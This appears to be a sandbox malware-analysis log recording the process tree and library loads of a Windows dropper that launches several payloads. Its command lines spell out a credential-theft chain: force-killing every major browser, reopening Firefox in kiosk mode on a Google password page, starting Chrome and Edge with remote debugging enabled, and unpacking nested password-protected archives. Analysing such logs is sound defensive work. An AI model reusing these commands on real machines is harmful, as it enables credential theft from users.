Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe "C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe "C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe "C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe "C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe"
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe "C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe"
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2080,i,17300030453258231598,16227378624072536825,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2252 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca8f1ef1-5ad9-4ea6-a4b3-1032a2574296} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1f4b686d710 socket
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe "C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe "C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1376 -parentBuildID 20230927232528 -prefsHandle 4416 -prefMapHandle 4412 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {36bd7abb-261f-4d61-be3b-96cf981c68b9} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1f4c7527410 rdd
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2044,i,13123127802507167736,11492811734729124769,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2008,i,6347898806173620045,4158636205428793632,262144 /prefetch:3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe "C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe "C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe"
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe "C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe "C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe "C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe "C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe "C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe "C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe "C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2080,i,17300030453258231598,16227378624072536825,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe "C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2252 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca8f1ef1-5ad9-4ea6-a4b3-1032a2574296} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1f4b686d710 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1376 -parentBuildID 20230927232528 -prefsHandle 4416 -prefMapHandle 4412 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {36bd7abb-261f-4d61-be3b-96cf981c68b9} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1f4c7527410 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2044,i,13123127802507167736,11492811734729124769,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2008,i,6347898806173620045,4158636205428793632,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
